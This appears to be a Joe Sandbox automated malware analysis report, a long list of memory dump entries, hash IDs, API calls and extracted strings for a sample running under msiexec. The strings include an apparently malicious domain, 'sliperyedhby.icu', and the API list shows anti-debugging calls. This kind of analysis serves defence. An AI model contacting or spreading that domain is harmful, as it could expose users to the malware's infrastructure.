• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ]ks$^FHn$^FHn$f@~-
                                                                                                                                                                                                                                • API String ID: 0-266902593
                                                                                                                                                                                                                                • Opcode ID: 0235a8d27baa008b3143cec70d61bae3b29c72a0981db2c3d29fafbb197ec960
                                                                                                                                                                                                                                • Instruction ID: d56d589da91237707260d86915a2a03547da22aba22615977a5f738b7114480e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0235a8d27baa008b3143cec70d61bae3b29c72a0981db2c3d29fafbb197ec960
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1761D8B0109B818FD3268B3584703E3BFD59FA3305F1989ACC2E65B283DB79590B8B55
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B591
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B5DB
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B6A1
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 661929714-0
                                                                                                                                                                                                                                • Opcode ID: 443be1ef29e62ef88122b3189e8221d89e7a6f532f7c3d8d54a0f1329e49fe8f
                                                                                                                                                                                                                                • Instruction ID: c1d1907a9eebbc101ad13cb3eda4fea202e6f5a56c8b260399dd3c842c6a3732
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 443be1ef29e62ef88122b3189e8221d89e7a6f532f7c3d8d54a0f1329e49fe8f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75618E71914207DFEFA89F28ED82BBB73A8EF45300F104169E915C6184E774EA81CBA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0618E175
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0618E17F
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0618E18C
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                • Opcode ID: 091a1e05097a59ee8a575ba3d7f2027b59106a24653fe93bf8747e2ee5b1b564
                                                                                                                                                                                                                                • Instruction ID: 27392771dae134448a54d8d654eecbc5a972ad3fc46723b7fcf2c46ae1b875d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091a1e05097a59ee8a575ba3d7f2027b59106a24653fe93bf8747e2ee5b1b564
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A31C674911218ABCB61EF64DD88B9DB7B4BF48310F5045DAE91CA6250E7709B85CF44
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )$)$IEND
                                                                                                                                                                                                                                • API String ID: 0-588110143
                                                                                                                                                                                                                                • Opcode ID: 4881527885c0e1f7f41c5bebba0b32e2546eed2061ac4d9fc4e595b0edb91590
                                                                                                                                                                                                                                • Instruction ID: 00a2ba663815675e27134c97461737fbf2402d130c435c83cf31aa4d9e12e7d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4881527885c0e1f7f41c5bebba0b32e2546eed2061ac4d9fc4e595b0edb91590
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15F11171A587829BE314DF29C85136ABBE0FB94314F44462DF99A973C1D774E824CBC2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: T{Hn$p0$x
                                                                                                                                                                                                                                • API String ID: 0-1006147570
                                                                                                                                                                                                                                • Opcode ID: 2049e403e984273db919c993af20fd9b8085b3868a1267afb48f68fb9e74ba50
                                                                                                                                                                                                                                • Instruction ID: 972829eed02df808584b319ad4844cb2bb756b89b4b361fa6daee8247d8e062a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2049e403e984273db919c993af20fd9b8085b3868a1267afb48f68fb9e74ba50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BB137716083105BE3199A29CC517BBF7D9DB89324F05493DE9A9C7392FB34DC448792
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ]ks$^FHn$f@~-
                                                                                                                                                                                                                                • API String ID: 0-2280255167
                                                                                                                                                                                                                                • Opcode ID: c4b39f939978ae3eaedc7435afb0168af3d3b48292ade3ad061d5330aa1cbff3
                                                                                                                                                                                                                                • Instruction ID: 29df170b6edba3b8e742c7c45d628bde06474011fc9b1e9cc6d926ccd243870a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4b39f939978ae3eaedc7435afb0168af3d3b48292ade3ad061d5330aa1cbff3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131E670105B818AD7268B3584607B3BBE59FA3315F1884ACC2EA9B283DB796507CB65
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: d!ru$k!ru$sliperyedhby.icu
                                                                                                                                                                                                                                • API String ID: 0-2240211030
                                                                                                                                                                                                                                • Opcode ID: a1e7406b855b25559003211d9bdbf6432f362c7d96807323337b694c946e1085
                                                                                                                                                                                                                                • Instruction ID: 06f0d5f086f0fde3409cf5e9697371339924abcf9417a9de5b4d4cf208bc5907
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1e7406b855b25559003211d9bdbf6432f362c7d96807323337b694c946e1085
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F0F43566A25087E31DCB269C6273FB6B79BC7711F28D11CE2C603285DE36CC028699
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: "$"
                                                                                                                                                                                                                                • API String ID: 0-3758156766
                                                                                                                                                                                                                                • Opcode ID: 5360d16b08bcaec69fd9787fe09701494882e175c651c930d033c3f856835693
                                                                                                                                                                                                                                • Instruction ID: 950d14345bd8ab40b33a5e22f3e1656871df92780c12a60e95bdb59c15f3f9b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5360d16b08bcaec69fd9787fe09701494882e175c651c930d033c3f856835693
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F12771A093018FD719CF24C8A272BBBE6ABC5314F19892DE8998B3D5E734DC15C782
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8k&i$Pw#u
                                                                                                                                                                                                                                • API String ID: 0-1304662748
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: R.$bP.
                                                                                                                                                                                                                                • API String ID: 0-3244487067
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0030BCD9
                                                                                                                                                                                                                                • -, xrefs: 0030BBBF
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: -$000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                                                                                                                                                • API String ID: 0-1945498036
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: P3l$`M
                                                                                                                                                                                                                                • API String ID: 0-786544796
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 002F9F0F, 002F9F67
                                                                                                                                                                                                                                • 0, xrefs: 002F9ED9
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                                                                                                                                                                                • API String ID: 0-1850561919
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @cba$LM
                                                                                                                                                                                                                                • API String ID: 0-1552593056
                                                                                                                                                                                                                                • Opcode ID: 5f5baf2d072b27d93b917d3af3be60d2e2c9a0cd353cc580611ce51ab273a678
                                                                                                                                                                                                                                • Instruction ID: 14a2734c1e4ceb1bc29233eca5203c0fa7184f071a0be8b3cb269db1d601c80f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f5baf2d072b27d93b917d3af3be60d2e2c9a0cd353cc580611ce51ab273a678
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 907103B19093448BC724DF25C8A176BBBE1EF95354F15892CF8CA8B385EB748905CB87
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `q$iy
                                                                                                                                                                                                                                • API String ID: 0-1982696797
                                                                                                                                                                                                                                • Opcode ID: 651df41ef682bf958c89b59e7b246c168a4e76f628e0c6566a394bbc6bb0d118
                                                                                                                                                                                                                                • Instruction ID: dd1b204fdf5b6c7ce5a4cd710c080ab07cbb7523d4fea633d0b7abd52531d5f8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 651df41ef682bf958c89b59e7b246c168a4e76f628e0c6566a394bbc6bb0d118
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9531BCB51483449FD3218F219855B5FBBB8EB82748F409A1DF5996B382CBB0940ACF93
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 5>$>8
                                                                                                                                                                                                                                • API String ID: 0-773987393
                                                                                                                                                                                                                                • Opcode ID: 701ec3be76f917b7ee050141ed97ed633c71aef6ba3f9420bae90bf33c8d16b6
                                                                                                                                                                                                                                • Instruction ID: 0f789a2c842d0c2d788547d71b1911c18bf1961ba98780346b7a85b3f0e69cce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 701ec3be76f917b7ee050141ed97ed633c71aef6ba3f9420bae90bf33c8d16b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 343138BBD103104BC71ACF34EC5655EBBE5A789304F19593EE491AF262EB34C5068B86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: G$tY#
                                                                                                                                                                                                                                • API String ID: 0-3755267963
                                                                                                                                                                                                                                • Opcode ID: 1a2a68533eeac8905dd2e65cc80e7511f23f501ddbdb3eea29d859a5948e1d54
                                                                                                                                                                                                                                • Instruction ID: 0c032e732163ab81c194ce42801e2068422c2ff0bba3303f3ad35775099a3446
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a2a68533eeac8905dd2e65cc80e7511f23f501ddbdb3eea29d859a5948e1d54
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F0F876A1C24047E30EDF299C6266AABA7EBD7304F19E93ED095D7751D538C403CA0A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,061973A1,?,?,?,?,?,?,00000000), ref: 061975D3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 38919114112619c508565b732a35e6b3c55f3cc40901a3aff34f368233e1d8cf
                                                                                                                                                                                                                                • Instruction ID: 9751b5a5736c69bc39e7d43f83d0fc654f5c9f36efa580c2a23b89aef4f6bb54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38919114112619c508565b732a35e6b3c55f3cc40901a3aff34f368233e1d8cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86B13D316206089FEB59CF2CC48AB657BE1FF45364F298658E899CF2E1C335E991CB50
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: TU
                                                                                                                                                                                                                                • API String ID: 0-2215587796
                                                                                                                                                                                                                                • Opcode ID: 3de10c29c0c42d6d5e1073c30d06cf39dcacb216388593bf9ce388031475b010
                                                                                                                                                                                                                                • Instruction ID: 27c7016dd2b74e44f54b7485a8f03a0919f4f89d06419d387b122f7ee59cf73d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de10c29c0c42d6d5e1073c30d06cf39dcacb216388593bf9ce388031475b010
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BE10636619711CBC7298F38E8512AB73E2FF89361F0A887DD4858B290E779CE91C751
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 06188612
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                • Opcode ID: 1d5a2aa85c2c3f299451f53c41ea909547eba06d389e6bcaab3bea41a5879c45
                                                                                                                                                                                                                                • Instruction ID: 860e804cfc1b003459e0fd59ed9aac232ddafece9c02c2de200ea2897c2a4827
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d5a2aa85c2c3f299451f53c41ea909547eba06d389e6bcaab3bea41a5879c45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A160B5D516058FDB59CF54E5817AEBBF2FB48324F24822ADA15E7380D3349584CF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0031F5B0,00000000,00000001,0031F5A0), ref: 002FE119
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                                                                                                • Opcode ID: a1629029ed88303f2527931de766cb5efee36cdf5a11dcab88c9be6366602f41
